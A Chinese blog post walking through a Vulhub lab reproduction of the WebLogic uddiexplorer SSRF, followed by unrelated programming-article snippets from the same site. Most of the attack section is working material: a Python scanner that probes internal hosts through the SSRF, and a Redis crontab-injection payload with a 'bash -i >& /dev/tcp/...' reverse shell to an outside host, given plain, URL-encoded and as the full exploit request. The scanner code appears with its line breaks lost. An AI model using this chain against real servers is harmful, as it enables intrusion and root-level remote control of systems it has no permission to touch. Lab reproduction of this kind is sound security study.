当前位置：首页 > news >正文

Weblogic ssrf漏洞复现

news 2026/2/8 7:46:15

文章目录

一、漏洞描述
二、漏洞特征
- 1.查看uddiexplorer应用
- 2.漏洞点
三、漏洞复现
- 1.获取容器内网ip
- 2.VULHUB Weblogic SSRF漏洞 docker中 centos6 无法启动的解决办法
- 3.准备payload
- 4.反弹shell

一、漏洞描述

SSRF

服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。

SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。
输入A网站URL --> 发送请求 --> A服务器接受请求（没有过滤）处理 -->返回用户响应

【网站有个请求是www.baidu,com/xxx.php?image=URL】

安全的网站应接收请求后，检测请求的合法性

产生的原因：服务器端的验证并没有对其请求获取图片的参数（image=）做出严格的过滤以及限制，导致A网站可以从其他服务器的获取数据

例如：www.baidu.com/xxx.php?image=www.abc.com/1.jpg

如果将www.abd.com/1.jpg换为与该服务器相连的内网服务器地址

如果存在该内网地址就会返回1xx 2xx 3xx 4xx之类的状态码，不存在就会其他的状态码

SSRF漏洞就是通过篡改获取资源的请求发送给服务器，但是服务器并没有检测这个请求是否合法的，然后服务器以这个请求中的身份来访问其他服务器的资源。
Redis未授权访问

未授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处未对当前用户进行权限识别，导致攻击者在没有获取到登录权限或未授权的情况下，对目标进行操作或者被信息泄露

Redis默认情况下，会绑定在0.0.0.0:6379，如果没有采用相关的策略，如配置防火墙规则避免其他非信任来源的IP访问，就会将Redis服务暴露在公网上；如果没有设置密码认证（一般为空）的情况下，会导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。

二、漏洞特征

1.查看uddiexplorer应用

http://192.168.232.131:7001/uddiexplorer/
在这里插入图片描述

2.漏洞点

192.168.232.131:7001/uddiexplorer/SearchPublicRegistries.jsp
3.burp抓包访问
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:23
非http协议端口返回could not connect over HTTP to server
在这里插入图片描述

http协议返回
returned a 404 error code
在这里插入图片描述

三、漏洞复现

1.获取容器内网ip

通过burp爆破查看错误的不同显示，即可探测内网ip和端口。
在这里插入图片描述

或者使用以下工具探测

import thread
import time
import re
import requestsdef ite_ip(ip):for i in range(1, 256):final_ip = '{ip}.{i}'.format(ip=ip, i=i)print final_ipthread.start_new_thread(scan, (final_ip,))time.sleep(3)def scan(final_ip):ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')for port in ports:vul_url = 'http://192.168.232.131:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)try:#print vul_urlr = requests.get(vul_url, timeout=15, verify=False)result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)result2 = re.findall('but could not connect', r.content)result3 = re.findall('No route to host', r.content)  if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:print '[!]'+final_ip + ':' + portexcept Exception, e:passif __name__ == '__main__':ip = "172.19.0"  if ip:print ipite_ip(ip)else:print "no ip"

docker ps
docker exec -it 3f3c5f3a0692 “/bin/bash”
ifconfig

在这里插入图片描述

2.VULHUB Weblogic SSRF漏洞 docker中 centos6 无法启动的解决办法

修改文件：/etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULT=“vsyscall=emulate”
update-grub 然后重启系统。

3.准备payload

test

set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.52.2/2000 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save

aaa
url编码后：
test%0A%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20/dev/tcp/192.168.52.2/2000%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20/etc/%0Aconfig%20set%20dbfilename%20crontab%0Asave%0A%0Aaaa
在这里插入图片描述

4.反弹shell

使用表单提交发布
operator=http://172.21.0.2:6379/test%0A%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20/dev/tcp/192.168.52.2/2000%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20/etc/%0Aconfig%20set%20dbfilename%20crontab%0Asave%0A%0Aaaa&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
在这里插入图片描述

成功反弹shell

在这里插入图片描述

注意系统时间要对上，否则可能会失败

Weblogic ssrf漏洞复现

文章目录一、漏洞描述二、漏洞特征1.查看uddiexplorer应用2.漏洞点三、漏洞复现1.获取容器内网ip2.VULHUB Weblogic SSRF漏洞 docker中 centos6 无法启动的解决办法3.准备payload4.反弹shell 一、漏洞描述 SSRF 服务端请求伪造(Server-Side Request Forgery),是一种由攻击者…...

编程日记 2023/11/6 10:45:28

Memcached构建缓存服务器

Memcache介绍 1、特点内置存储方式----------为了提高性能，memcached中保存的数据都存储在memcache内置的内存存储空间中。由于数据仅存在于内存中，重启操作系统会导致全部数据消失简单key/value存储--------------服务器不关心数据本身的意义及结构&…...

编程日记 2023/11/6 10:44:26

vue3+element Plus实现弹框的拖拽、可点击底层页面功能

1、template部分 <el-dialog:modal"false"v-model"dialogVisible"title""width"30%"draggable:close-on-click-modal"false"class"message-dialog"> </el-dialog> 必须加的属性 modal:是否去掉遮罩层…...

编程日记 2023/11/6 10:43:25

Vue+elementui 纯前端实现Excel导入导出功能（区分表头标题）

引入插件 import * as XLSX from "xlsx/xlsx.mjs"; import { read, utils } from xlsx/xlsx.mjs; 上传文件方法 // 上传文件状态改变时的钩子，添加文件、上传成功和上传失败时都会被调用async handle(ev) {//改变表格key值this.$refs.cpkTable.loading…...

编程日记 2023/11/6 10:42:24

使用Scrapy的调试工具和日志系统定位并解决爬虫问题

目录摘要一、Scrapy简介二、Scrapy的调试工具 1、Shell调试工具 2、断点调试三、Scrapy的日志系统四、实例解析 1、启用详细日志 2、断点调试 3、分析日志 4、解决问题五、代码示例总结摘要本文详细介绍了如何使用Scrapy的调试工具和日志系统来定位并解…...

编程日记 2023/11/6 10:40:21

Pycharm安装配置Pyqt5教程(保姆级)

目录一、前言 1、依赖包 2、工具二、安装依赖包三、配置环境四、配置设计工具 1、Qt Designer 2、PyRcc 3、PyUIC 五、使用 1、界面设计 2、ui文件转化为py文件一、前言很多情况下需要为程序设计一个GUI界面，在Python中使用较多的用户界面设计工具…...

编程日记 2023/11/6 10:39:19

基于单片机的养殖场温度控制系统设计

博主主页：单片机辅导设计博主简介：专注单片机技术领域和毕业设计项目。主要内容：毕业设计、简历模板、学习资料、技术咨询。文章目录主要介绍一、控制系统设计二、系统方案设计2.1 系统运行方案设计2.1.1 羊舍环境温度的确定三、系统仿…...

编程日记 2023/11/6 10:37:17

时序分解 | Matlab实现EMD经验模态分解时间序列信号分解

时序分解 | Matlab实现EMD经验模态分解时间序列信号分解目录时序分解 | Matlab实现EMD经验模态分解时间序列信号分解效果一览基本介绍程序设计参考资料效果一览基本介绍 Matlab实现EMD经验模态分解时间序列信号分解 Matlab语言算法新颖小众，用的人很少&#xf…...

编程日记 2023/11/6 10:36:16

解决无法进入MERCURY路由器管理界面的问题水星网络路由器

问题：今天家里停电了，来电过后，路由器有信号，但是手机连上WiFi后无法正常上网。尝试过给路由器断电开电，拔插网线。试了这两种方法后手机依然无法正常上网。最后想到了重启路由器，也就是将路由器恢复出厂设…...

编程日记 2023/11/6 10:34:15

Ansible自动化安装部署及使用

目录前言一、环境概况修改主机名（可选项） 二、安装部署 1.安装epel扩展源 2.安装Ansible 3.修改Ansible的hosts文件 4.生成密钥三、Ansible模块使用介绍 Command模块 Shell模块 User模块 Copy模块 File模块 Hostname模块 Yum模块 Ser…...

编程日记 2023/11/6 10:33:13

idea中配置spring boot单项目多端口启动

参照文章 https://zhuanlan.zhihu.com/p/610767685 项目配置如下下面为 idea 2023，不同版本的设置有区别，但是没那么大，idea 2023默认使用新布局，切换为经典布局即可。在项目根目录的.idea/workspace.xml文件里添加如下配置 &l…...

编程日记 2023/11/6 10:31:11

MP4视频文件损坏怎么修复？

3-2 作为摄影师，或者在平时有拍摄工作的事情的，比如搞婚庆、搞航拍什么的，有一定的概率会遇到损坏的视频文件，比如相机突然断电、无人机炸机等，有可能会导致保存的MP4文件损坏。这种文件使用播放器播放的话&#xf…...

编程日记 2023/11/6 10:30:09

使用electron ipcRenderer接收通信消息多次触发

使用electron ipcRenderer接收通信消息多次触发在使用electron ipcRenderer.on接收ipcRenderer.send的返回值时，ipcRenderer.send发送一次信息， ipcRenderer.on会打印多个日志， renderer.once(get-file-path, (event: any, paths: any) &g…...

编程日记 2023/11/6 10:29:08

Spring事务最佳应用指南（包含：事务传播类型、事务失效场景、使用建议、事务源码分析）

前言本文主要介绍的是在Spring框架中有关事务的应用方式，以及一些生产中常见的与事务相关的问题、使用建议等。同时，为了让读者能够更容易理解，本文在讲解过程中也会通过源码以及案例等方式进行辅助说明，通过阅读本文不但能够解…...

编程日记 2023/11/6 10:28:06

Go语言的Http包及冒泡排序解读

目录标题 Http一.Get二、Post三、Http服务器 BubbleSort冒泡排序 Http 一.Get package mainimport ("fmt""io/ioutil""net/http")func main() {response, err : http.Get("http://www.baidu.com")if err ! nil {fmt.Println("Ht…...

编程日记 2023/11/6 10:27:05

vue二维码生成插件qrcodejs2-fix、html生成图片插件html2canvas、自定义打印内容插件print-js的使用及问题总结

一、二维码生成插件qrcodejs2-fix 1.安装命令 npm i qrcodejs2-fix --save2.页面使用 import { nextTick } from vue; import QRCode from qrcodejs2-fix; nextTick(() > {let codeView document.querySelector("#codeView");codeView.innerHTML ""…...

编程日记 2023/11/6 10:26:04

[SSD综述1.8] 固态存储市场发展分析与预测_固态存储技术发展方向（2022to2023）

依公知及经验整理，原创保护，禁止转载。专栏《SSD入门到精通系列》 <<<< 返回总目录 <<<< 前言自2020年疫情爆发以来，远程办公、网上教育、流媒体等等应用引爆对消费电子及云服务的需求增长，全球数字化转型加速，带来了两年的闪存风光时…...

编程日记 2023/11/6 10:25:03

【Linux】多路IO复用技术③——epoll详解如何使用epoll模型实现简易的一对多服务器（附图解与代码实现）

在正式阅读本篇博客之前，建议大家先按顺序把下面这两篇博客看一下，否则直接来看这篇博客的话估计很难搞懂多路IO复用技术①——select详解&如何使用select模型在本地主机实现简易的一对多服务器http://t.csdnimg.cn/BiBib多路IO复用技术②——poll…...

编程日记 2023/11/6 10:24:02

【unity实战】实现类似英雄联盟的buff系统（附项目源码）

文章目录先来看看最终效果前言开始BUFF系统加几个BUFF测试1. 逐层消失，升级不重置剩余时间的BUFF2. 一次性全部消失，升级重置剩余时间的BUFF3. 永久BUFF，类似被动BUFF4. 负面BUFF，根据当前BUFF等级计算每秒收到伤害值&#xff0c…...

编程日记 2023/11/6 10:23:00

Draft-P802.11be-D3.2协议学习$9-Frame-Format$9.3.1.22-Trigger-frame-format

Draft-P802.11be-D3.2协议学习__$9-Frame-Format__$9.3.1.22-Trigger-frame-format 9.3.1.22.1 Genreal9.3.1.22.2 Common Info field9.3.1.22.3 Special User Info field9.3.1.22.4 HE variant User Info field9.3.1.22.5 EHT variant User Info field9.3.1.22.6 Basic Trigge…...

编程日记 2023/11/6 10:20:53